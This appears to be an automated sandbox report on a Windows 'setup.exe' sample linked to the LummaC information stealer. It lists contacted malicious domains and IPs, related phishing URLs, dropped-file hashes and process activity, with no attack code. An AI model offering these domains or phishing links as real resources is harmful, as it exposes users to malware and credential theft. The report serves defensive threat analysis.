                                                                                                                http://ocsp.sectigo.com0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                  high
                                                                                                                  http://ocsp.vikingcloud.com/0Asetup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                    high
                                                                                                                    http://certs.securetrust.com/issuers/TWGCA.crt0setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                      high
                                                                                                                      http://ocsp.vikingcloud.com/0:setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                        high
                                                                                                                        https://cegu.shop/8574262446/ph.txt3hsetup.exe, 00000000.00000003.2073247216.000000000090D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005938451.0000000000909000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17setup.exe, 00000000.00000003.1830105452.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841442094.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829977664.0000000003702000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1841764761.00000000036B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://go.microspowershell.exe, 00000004.00000002.2014602281.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://crl.microsoft.copowershell.exe, 00000004.00000002.2028338121.0000000008C42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://x1.c.lencr.org/0setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://x1.i.lencr.org/0setup.exe, 00000000.00000003.1854856966.0000000003699000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crt.sectigo.com/SectigF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installsetup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://subca.ocsp-certum.com01F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                              high
                                                                                                                                              https://contoso.com/powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://sectigo.com/CPS0DF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dfgh.onlinepowershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://jrsoftware.org0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://jrsoftware.org/F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allsetup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://klipvumisui.shop/int_clp_sha.txt~setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          http://crl.trustwave.com/TWGCA.crl0nsetup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://sectigo.com/CPS0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://repository.certum.pl/ctnca.cer09F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosetup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://crl.securetrust.com/TWGCSCA_L1.crl0ysetup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.certum.pl/CPS0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://crl.certum.pl/cscasha2.crl0qF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://aka..winsvrpowershell.exe, 00000004.00000002.2025410025.0000000007AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://cscasha2.ocsp-certum.com04F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                              high
IP              Domain             Country         ASN    ASN Name         Malicious
104.21.32.1     learningypr.click  United States   13335  CLOUDFLARENETUS  true
185.161.251.21  cegu.shop          United Kingdom  5089   NTLGB            false
172.67.208.58   klipvumisui.shop   United States   13335  CLOUDFLARENETUS  false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582503
Start date and time: 2024-12-30 19:09:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@59/15@4/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BrightLib.exe, PID 7584 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 7672 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: setup.exe
| Time | Type | Description |
|---|---|---|
| 13:10:12 | API Interceptor | 11x Sleep call for process: setup.exe modified |
| 13:10:29 | API Interceptor | 16x Sleep call for process: powershell.exe modified |
| 13:11:27 | API Interceptor | 1x Sleep call for process: BrightLib.exe modified |
                                                                                                                                                                                                        CLOUDFLARENETUSSharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 104.21.64.143
                                                                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.0.151
                                                                                                                                                                                                        https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.64.143
                                                                                                                                                                                                        https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                        • 104.18.87.62
                                                                                                                                                                                                        BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
Match: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
Associated samples:
• Filename: Set-up.exe, Detection: malicious, Threat Name: LummaC
• Filename: #Setup.exe, Detection: malicious, Threat Name: LummaC
• Filename: installer_1.05_36.5.exe, Detection: malicious, Threat Name: LummaC
• Filename: @Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
• Filename: MdhO83N5Fm.exe, Detection: malicious, Threat Name: LummaC
Match: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
Associated samples:
• Filename: Set-up.exe, Detection: malicious, Threat Name: LummaC
• Filename: #Setup.exe, Detection: malicious, Threat Name: LummaC
• Filename: installer_1.05_36.5.exe, Detection: malicious, Threat Name: LummaC
• Filename: @Setup.exe, Detection: malicious, Threat Name: LummaC Stealer
• Filename: MdhO83N5Fm.exe, Detection: malicious, Threat Name: LummaC
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:Nlllul9kLZ:NllUG
MD5: 087D847469EB88D02E57100D76A2E8E4
SHA1: A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256: 81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512: 4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious: false
Process: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
File Type: PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 6447207
Entropy (8bit): 7.998441497232368
Encrypted: true
SSDEEP: 196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
MD5: B0CB3F07919BEB69B342ED871C6511A9
SHA1: C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
SHA-256: AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
SHA-512: 75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
Malicious: false
Process: C:\Users\user\Desktop\setup.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 8767044
Entropy (8bit): 7.960152326344281
Encrypted: false
SSDEEP: 196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
MD5: 51F99EDDD33CC04FB0F55F873B76D907
SHA1: 60CD79359912A9069674CEE3C5C5982A9B01CE82
SHA-256: 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
SHA-512: 7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 39%
Joe Sandbox View:
• Filename: Set-up.exe, Detection: malicious
• Filename: #Setup.exe, Detection: malicious
• Filename: installer_1.05_36.5.exe, Detection: malicious
• Filename: @Setup.exe, Detection: malicious
• Filename: MdhO83N5Fm.exe, Detection: malicious
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                             • Filename: Set-up.exe, Detection: malicious
                                                                                                                                                                                                                             • Filename: #Setup.exe, Detection: malicious
                                                                                                                                                                                                                             • Filename: installer_1.05_36.5.exe, Detection: malicious
                                                                                                                                                                                                                             • Filename: @Setup.exe, Detection: malicious
                                                                                                                                                                                                                             • Filename: MdhO83N5Fm.exe, Detection: malicious
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.100988274870544
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.79%
                                                                                                                                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            File name:setup.exe
